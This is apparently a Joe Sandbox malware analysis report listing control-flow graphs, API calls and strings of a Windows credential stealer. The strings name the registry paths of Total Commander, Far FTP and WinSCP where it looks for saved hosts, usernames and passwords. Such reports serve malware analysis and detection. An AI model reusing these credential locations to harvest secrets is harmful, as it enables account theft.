                                                                                                                                                                                                                • Opcode ID: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                                                                                                                                                                                                                • Instruction ID: 078c109d1665b9b830d76e00ceeb27c9797f204ae48b5850d213398ac2e03a3c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F21CEB8801244DFD700DF59F945A857BF4BB08385F0086BAE708E76B0E7B458808F0D
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetForegroundWindow.USER32(00427ED0,00427ED0,?,?,?,0040A17D,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A065
                                                                                                                                                                                                                • CoCreateInstance.OLE32(0040E218,00000000,00000015,0040E238,00000001,?,?,?,0040A17D,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A07E
                                                                                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 0040A088
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ForegroundWindow$CreateInstance
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2498160819-0
                                                                                                                                                                                                                • Opcode ID: 82b24d427a4319f76012a439117db5c4ff365e6f2f98325e2b41cf4565e173f1
                                                                                                                                                                                                                • Instruction ID: 3fc8f4a2167e7ffe653cafe2f971d35c6ed40139ecea7ac55ee7c5b8babae7fd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82b24d427a4319f76012a439117db5c4ff365e6f2f98325e2b41cf4565e173f1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8F03C71640208FFD7049FA6CD8DC5ABBFCEF9970172009AAF101EB290D6755950DA25
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 00406CCF
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Version
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1889659487-0
                                                                                                                                                                                                                • Opcode ID: 55562b46774a615dc2e97dfe1c8d2773bede11335cf8e3c3be8baa064d73f36a
                                                                                                                                                                                                                • Instruction ID: 5612040357c07126fa19026aaffe8c4f09115318cb9d2fe7a616e1c4ae3a2977
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55562b46774a615dc2e97dfe1c8d2773bede11335cf8e3c3be8baa064d73f36a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9E04FB2D4011D5BDB1C9B60EE47BD9BBF8EB11304F0140E6D746E5180E6B8DB848F95
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 6a180277a47174503745c50212eccdbe59cf0734582742268f170c434fce9886
                                                                                                                                                                                                                • Instruction ID: 218ff2483168da8b183dc8d255f139c90e55d0551e3cd34b08f9c15d5f680e8f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a180277a47174503745c50212eccdbe59cf0734582742268f170c434fce9886
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB423CB6E413099FDB08CFD6D8C09DCB7B3FFD8314B1A91A9C505A7316D6B87A068A50

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 129 402e3e-402e59 call 40d5b0 132 40327e-403286 129->132 133 402e5f-402e60 129->133 134 402e61-402ea5 call 40586b call 4058fb 133->134 139 402eb4 134->139 140 402ea7-402ead 134->140 142 402eb7-402ecb GetModuleFileNameW 139->142 140->139 141 402eaf-402eb2 140->141 141->142 143 402ed6-402edc GetCurrentDirectoryW 142->143 144 402ecd-402ed4 call 406cf9 142->144 146 402ee2-402f14 call 405511 call 4054ed * 2 143->146 144->146 154 402f16-402f22 call 405467 146->154 155 402f2a-402f94 GetLastError call 40a786 call 407552 call 405511 call 40584d 146->155 154->155 160 402f24 154->160 167 402f96-402fa6 155->167 168 402fa8 call 4056f9 155->168 160->155 169 402fad-402fd8 call 4054ed * 2 call 40584d 167->169 168->169 177 402fda-402fea 169->177 178 402fec call 4056f9 169->178 179 402ff1-403038 call 4054ed * 2 call 405511 call 4054ed 177->179 178->179 189 40303a-40304a 179->189 190 40304c call 4056f9 179->190 191 403051-403081 call 4054ed * 3 call 40584d 189->191 190->191 201 403083-403093 191->201 202 403095-40309b call 4056f9 191->202 203 4030a0-403132 call 405451 call 406d42 call 405511 call 4054ed * 4 call 40253c 201->203 202->203 221 403251-40325f GetLastError 203->221 222 403138-40313e 203->222 225 403262-403276 call 40a786 221->225 223 403144-403148 222->223 224 40322d-403235 222->224 223->224 228 40314e-403186 call 40584d call 407552 call 405511 call 40584d 223->228 226 403241 224->226 227 403237-40323f GetLastError 224->227 225->134 234 40327c-40327d 225->234 230 403244-40324f 226->230 227->230 241 403188-403198 228->241 242 40319a call 4056f9 228->242 230->225 234->132 243 40319f-4031c8 call 4054ed * 2 call 40584d 241->243 242->243 251 4031ca-4031da 243->251 252 4031dc call 4056f9 243->252 253 4031e1-403228 call 4054ed * 2 call 40253c 251->253 252->253 253->221 261 40322a 253->261 261->224
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 004058FB: _memset.LIBCMT ref: 0040591C
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 00402EC3
                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00001000,00420840), ref: 00402EDC
                                                                                                                                                                                                                • GetLastError.KERNEL32(?), ref: 00402F4E
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00403237
                                                                                                                                                                                                                • GetLastError.KERNEL32(?), ref: 00403258
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$CurrentDirectoryFileModuleName_memset
                                                                                                                                                                                                                • String ID: .html$4@$8@$8@$From: $Via: $^client=$^key=$file$none
                                                                                                                                                                                                                • API String ID: 2247176544-2288798624
                                                                                                                                                                                                                • Opcode ID: 9ae992922a2ad1b825f1490aaeac56172bb5fbdf92c9f9a8e97600dc8421b205
                                                                                                                                                                                                                • Instruction ID: 295a2e83bb6b363340795eecc9968ea2d400926a6410b4e4a91bd94f8c6abde8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ae992922a2ad1b825f1490aaeac56172bb5fbdf92c9f9a8e97600dc8421b205
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01B17E72A001199BCB24EF61CD91AEB77A9EF44304F4040BFF519E7291EA389A858F59

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 307 40b096-40b0ac call 40d5b0 310 40b0b5-40b0bb 307->310 311 40b0ae-40b0b0 307->311 313 40b0bd-40b0cd call 407995 310->313 314 40b0cf-40b0d1 call 407951 310->314 312 40b2c9-40b2cd 311->312 318 40b0d6-40b0e5 313->318 314->318 319 40b160-40b166 318->319 320 40b0e7-40b0f1 318->320 321 40b177 InternetClearAllPerSiteCookieDecisions 319->321 322 40b168-40b175 InternetSetPerSiteCookieDecisionW 319->322 320->319 323 40b0f3-40b0f9 320->323 324 40b17d-40b184 call 4032b8 321->324 322->324 323->319 325 40b0fb-40b10b GetModuleFileNameW 323->325 332 40b186-40b196 GetLastError call 40a786 324->332 333 40b199-40b1a2 324->333 327 40b116-40b118 GetCurrentDirectoryW 325->327 328 40b10d-40b114 call 406cf9 325->328 330 40b11e-40b15a call 405511 call 4054ed call 40253c 327->330 328->330 330->311 330->319 332->333 337 40b1a9-40b1ae 333->337 340 40b1b0-40b1cd CreateThread 337->340 341 40b1ce-40b1df 337->341 340->341 341->337 343 40b1e1-40b1e7 341->343 345 40b1e9-40b1eb 343->345 346 40b1ed-40b200 call 40a786 343->346 345->346 348 40b221-40b226 345->348 355 40b202-40b209 call 40b023 346->355 356 40b20e-40b210 346->356 351 40b228-40b23b CloseHandle 348->351 352 40b23d-40b24b call 40a6c9 InternetClearAllPerSiteCookieDecisions 348->352 351->351 351->352 360 40b2c6-40b2c8 352->360 361 40b24d-40b257 352->361 355->356 356->348 359 40b212-40b21b WaitForMultipleObjects 356->359 359->348 360->312 361->360 362 40b259-40b25f 361->362 362->360 363 40b261-40b271 GetModuleFileNameW 362->363 364 40b273-40b27a call 406cf9 363->364 365 40b27c-40b27e GetCurrentDirectoryW 363->365 367 40b284-40b2c0 call 405511 call 4054ed call 40253c 364->367 365->367 367->311 367->360
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000,00000000,00000000,00000000,?,0040B320,00000000,?,0040B3E0), ref: 0040B103
                                                                                                                                                                                                                • InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000004,?,0040B320,00000000,?,0040B3E0), ref: 0040B188
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
                                                                                                                                                                                                                • String ID: \netprotdrvss.exe$begun.ru
                                                                                                                                                                                                                • API String ID: 2887986221-2660752650
                                                                                                                                                                                                                • Opcode ID: ad6e69e745eb0134cfaa1d61605679bf99b5aa58cc3a10e76cbc4c8091dfe4a8
                                                                                                                                                                                                                • Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad6e69e745eb0134cfaa1d61605679bf99b5aa58cc3a10e76cbc4c8091dfe4a8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 375 403c10-403c73 call 40be9d call 405511 * 2 call 40848f 384 403c75-403c77 375->384 385 403ca9-403cad 375->385 384->385 386 403c79-403c94 ExpandEnvironmentStringsW 384->386 387 403cb3-403d15 call 405511 * 3 385->387 388 403dfe 385->388 389 403c95 call 4039ea 386->389 404 403d18-403d34 SHGetFolderPathW 387->404 390 403e00-403e08 call 4033a0 388->390 391 403e0a-403e12 call 40be3a 388->391 393 403c9a-403ca3 PathRemoveFileSpecW 389->393 400 403e13-403e17 390->400 391->400 393->385 405 403d36-403d39 404->405 406 403d7f-403d86 404->406 408 403d5a 405->408 409 403d3b-403d58 call 4039a3 405->409 406->404 407 403d88-403d8c 406->407 407->388 412 403d8e-403dce call 405511 * 2 call 40848f 407->412 411 403d5c-403d76 408->411 409->411 414 403d77 call 408248 411->414 422 403dd0-403dd2 412->422 423 403dfa 412->423 416 403d7c 414->416 416->406 422->423 424 403dd4-403df7 ExpandEnvironmentStringsW call 4039a3 422->424 423->388 424->423
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403C84
                                                                                                                                                                                                                  • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                                                                                                                                                                                                                  • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                                                                                                                                                                                                                  • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                                                                                                                                                                                                                  • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                                                                                                                                                                                                                  • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                                                                                                                                                                                                                  • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                                                                                                                                                                                                                • PathRemoveFileSpecW.SHLWAPI(?), ref: 00403CA3
                                                                                                                                                                                                                  • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00403D2C
                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403DDF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocEnvironmentExpandPathPrivateProfileStringStrings$FileFolderFreeOpenRemoveSpec
                                                                                                                                                                                                                • String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$ftpininame$installdir
                                                                                                                                                                                                                • API String ID: 2046068145-3914982127
                                                                                                                                                                                                                • Opcode ID: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                                                                                                                                                                                                                • Instruction ID: e3ad36e3959a395177e0e2b587ea9ce0600459653a05a841f57562a17ae86195
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF516D72D0010CABDB10DAA1DC85FDF77BCEB44305F1044BBE515F2181EA789B898B65

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 437 4027e6-402809 OleInitialize call 40a469 440 402813-402819 437->440 441 40280b-40280e 437->441 443 402820-402832 call 405511 440->443 444 40281b-40281e 440->444 442 402c2d-402c31 441->442 445 402838-40284f call 40a345 443->445 444->443 444->445 450 402851 445->450 451 40285f-402862 445->451 452 402852 call 40a65e 450->452 453 402864-402867 451->453 454 402869 451->454 457 402857-40285a 452->457 453->454 455 402879-40287d 453->455 456 402869 call 4072ed 454->456 459 40287f call 409f2b 455->459 458 40286e-402873 456->458 460 402c2c 457->460 458->455 461 402884-402888 459->461 460->442 462 402893-4028a0 461->462 463 40288a-40288d 461->463 465 4028a2-4028ad 462->465 466 4028b7-4028be 462->466 463->462 464 40296a 463->464 469 402970-402978 464->469 467 4028af call 408f26 465->467 466->464 468 4028c4-4028cc 466->468 472 4028b4 467->472 473 4028d3-4028e3 468->473 474 4028ce 468->474 470 402c20-402c23 469->470 471 40297e-402984 469->471 475 402c25 call 40a65e 470->475 476 402986-4029a2 call 40a569 471->476 477 4029bc-4029c0 471->477 472->466 478 4028e5 call 408f26 473->478 474->473 480 402c2a 475->480 493 4029a5 call 4089fd 476->493 482 4029c2-4029de call 40a569 477->482 483 4029f8-4029fc 477->483 479 4028ea-4028ef 478->479 484 4028f1-402925 call 407573 SysAllocString 479->484 485 402956-402957 479->485 480->460 501 4029e1 call 4089fd 482->501 488 402a04-402a0c 483->488 489 4029fe-402a02 483->489 504 402927-402938 SysFreeString 484->504 505 40293a-402941 484->505 495 402959 call 40a65e 485->495 490 402a3b-402a44 488->490 491 402a0e-402a35 call 40920a call 409c49 SysAllocString SysFreeString 488->491 489->488 489->490 499 402a46-402a5a 490->499 500 402a6f-402a73 490->500 491->490 498 4029aa-4029b8 493->498 502 40295e 495->502 498->477 506 402a5d call 408f26 499->506 507 402aa2-402aa6 500->507 508 402a75-402a8d 500->508 509 4029e6-4029f4 501->509 502->464 504->504 504->505 511 402943-402945 505->511 512 402947-40294a call 4091bd 505->512 513 402a62-402a6c SysAllocString 506->513 515 402ad1-402ad5 507->515 516 402aa8-402abc 507->516 514 402a90 call 408f26 508->514 509->483 521 40294f-402954 511->521 512->521 513->500 523 402a95-402a9f SysAllocString 514->523 518 402b04-402b07 515->518 519 402ad7-402aef 515->519 517 402abf call 408f26 516->517 524 402ac4-402ace SysAllocString 517->524 526 402b09 call 40a65e 518->526 525 402af2 call 408f26 519->525 521->469 523->507 524->515 527 402af7-402b01 SysAllocString 525->527 528 402b0e-402b11 526->528 527->518 529 402b13 528->529 530 402b1a-402b2d 528->530 529->530 531 402b49-402b4d 530->531 532 402b2f-402b47 call 407573 530->532 533 402b55-402b66 call 407573 call 409c49 531->533 534 402b4f-402b53 531->534 532->531 536 402b6b-402b6f 533->536 534->533 534->536 540 402b71-402b7e call 40584d call 409c49 536->540 541 402b83-402b87 536->541 540->541 544 402b89-402b9c call 407573 541->544 545 402b9e-402ba2 541->545 544->545 548 402ba4-402bad call 40584d 545->548 549 402baf-402be1 call 40584d 545->549 548->549 556 402be3-402be8 call 408825 549->556 557 402bea call 408692 549->557 561 402bef-402bf8 556->561 557->561 562 402bfa-402bfd 561->562 563 402bff 561->563 562->563 564 402c01-402c0f SysFreeString 562->564 563->564 564->470 565 402c11-402c1e SysFreeString 564->565 565->470 565->565
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 004027F5
                                                                                                                                                                                                                  • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                                                                                                                                                                                                                  • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Internet$InitializeOpenOption
                                                                                                                                                                                                                • String ID: From: true
                                                                                                                                                                                                                • API String ID: 1176259655-9585188
                                                                                                                                                                                                                • Opcode ID: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
                                                                                                                                                                                                                • Instruction ID: 80b93d55993982ee294e6d3758cd093c071ceb3c0ab782597868a4ea0391af47
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89C1E371E00219AFDF20AFA5CD49A9E77B5AB04304F10447BF814B32D2D6B89D41CFA9

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 566 4041e4-40420c HeapAlloc 567 404212-40429b call 405511 * 2 call 40be9d call 405511 * 4 566->567 568 40445e-404462 566->568 583 4042a0-4042bb RegOpenKeyExW 567->583 584 404430-404437 583->584 585 4042c1-4042d4 583->585 584->583 587 40443d-404449 call 40be3a 584->587 586 40440f-404421 RegEnumKeyExW 585->586 588 404427-40442a RegCloseKey 586->588 589 4042d9-4042fc call 40848f 586->589 594 404455-40445d call 40be3a 587->594 595 40444b-404453 call 4033a0 587->595 588->584 596 404302-404304 589->596 597 4043fd-40440c 589->597 594->568 595->568 596->597 600 40430a-40432d call 40848f 596->600 597->586 605 404333-404350 call 40848f 600->605 606 40432f-404331 600->606 605->597 614 404356-404358 605->614 606->605 607 40435e-40437b RegOpenKeyExW 606->607 610 404395 607->610 611 40437d-404393 call 40845d 607->611 613 404398-40439e 610->613 611->613 613->597 616 4043a0-4043a2 613->616 614->597 614->607 616->597 617 4043a4-4043ae call 404189 616->617 617->597 620 4043b0-4043ea call 405511 call 40c3f9 617->620 620->597 625 4043ec-4043f8 call 40c00b 620->625 625->597 628 4043fa 625->628 628->597
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 004041FD
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,00000008), ref: 004042B3
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00404373
                                                                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404419
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040442A
                                                                                                                                                                                                                  • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HeapOpen$AllocCloseEnumFree
                                                                                                                                                                                                                • String ID: SOFTWARE\Far2\Plugins\ftp\hosts$SOFTWARE\Far\Plugins\ftp\hosts$ftp://%s:%s@%s$hostname$password$user$username
                                                                                                                                                                                                                • API String ID: 416369273-4007225339
                                                                                                                                                                                                                • Opcode ID: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                                                                                                                                                                                                                • Instruction ID: d928ca8cdb490927e602bcc25cbe761e1e9ca2c88fd961b6a2cac4e28df6e2a2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF717DB2900118ABCB20EB95CD45EEFBBBDEF48314F10457BF615F2181EA349A458B69
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008), ref: 00404542
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 004045DA
                                                                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404605
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040476D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocCloseEnumHeapOpen
                                                                                                                                                                                                                • String ID: SOFTWARE\martin prikryl\winscp 2\sessions$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
                                                                                                                                                                                                                • API String ID: 3497950970-285550827
                                                                                                                                                                                                                • Opcode ID: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                                                                                                                                                                                                                • Instruction ID: 619369561540f7679ee4dce6ffb5b1aea82e2176e3673c83278f81db5409ea06
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE715DB2900119AFDB10DBD5CD81AEF77BCEB48308F10447AE605F3291EB389E458B68
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • InternetOpenUrlW.WININET(?,hOA,?,00000000,04400000,00000000), ref: 00409CCB
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF4
